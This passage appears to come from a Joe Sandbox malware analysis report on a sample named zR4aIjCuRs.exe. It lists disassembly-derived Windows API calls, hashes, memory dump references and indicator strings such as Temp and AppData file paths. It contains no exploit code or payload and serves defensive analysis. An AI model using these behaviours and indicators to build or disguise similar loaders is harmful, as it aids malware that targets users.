                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                  • Instruction ID: 5c868bdd594fc053bdde718b2d54d3bc7308835e7239c12b28f3ea995dd83e98
                                  • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                  • Instruction Fuzzy Hash: 3EC09BB27443007BDE118F909D49F1777545790741F18447D7344F51E0D674D450D61C
                                  APIs
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                  APIs
                                  • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                  • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                  • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                  • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                  APIs
                                  • KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2492992576-0
                                  • Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                  • Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
                                  • Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                  • Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19
                                  APIs
                                    • Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                    • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                    • Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
                                    • Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                    • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                    • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                    • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406756
                                    • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                    • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 2972824698-0
                                  • Opcode ID: fe831e2aae84e219dea269f70c896ea3d406de4a870458ebbf780fe83d31e9a4
                                  • Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
                                  • Opcode Fuzzy Hash: fe831e2aae84e219dea269f70c896ea3d406de4a870458ebbf780fe83d31e9a4
                                  • Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E
                                  APIs
                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 0bc635984c6f466b42bf69b1192a92afab3c6d6232f2671ab24b9074207b237f
                                  • Instruction ID: 4fc8e819a9ec015efa4fb87cb4f3efb4dacce27a9684fd7b71b6c066277d8bf2
                                  • Opcode Fuzzy Hash: 0bc635984c6f466b42bf69b1192a92afab3c6d6232f2671ab24b9074207b237f
                                  • Instruction Fuzzy Hash: 19D0A773F142008BD710DBB8BE8949E73E8E780329330883BE102F10D1E978D8424E2C
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                  • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                  • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                  • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                  • DeleteObject.GDI32(00000000), ref: 00404D94
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                  • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                  • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                  • GlobalFree.KERNEL32(?), ref: 004050CE
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                  • ShowWindow.USER32(?,00000000), ref: 0040526D
                                  • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                  • ShowWindow.USER32(00000000), ref: 0040527F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                  • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                  • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                  • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                  APIs
                                  • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 004059F5
                                  • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A3D
                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A60
                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A66
                                  • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A76
                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                  • FindClose.KERNEL32(00000000), ref: 00405B25
                                  Strings
                                  • "C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 004059CC
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                  • \*.*, xrefs: 00405A37
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                  • API String ID: 2035342205-474606463
                                  • Opcode ID: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                  • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                  • Opcode Fuzzy Hash: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                  • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                  APIs
                                  • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                  Strings
                                  • C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 004021C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges
                                  • API String ID: 542301482-3897678559
                                  • Opcode ID: e60a4f12c6f1b09632b0029568e31388158c347d8d225f2ce6bc6dcfc08c0e49
                                  • Instruction ID: d410e27007f87fae541732bdb1cbefdb239a2090c9e466904aadd755c5c79360
                                  • Opcode Fuzzy Hash: e60a4f12c6f1b09632b0029568e31388158c347d8d225f2ce6bc6dcfc08c0e49
                                  • Instruction Fuzzy Hash: 0D413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
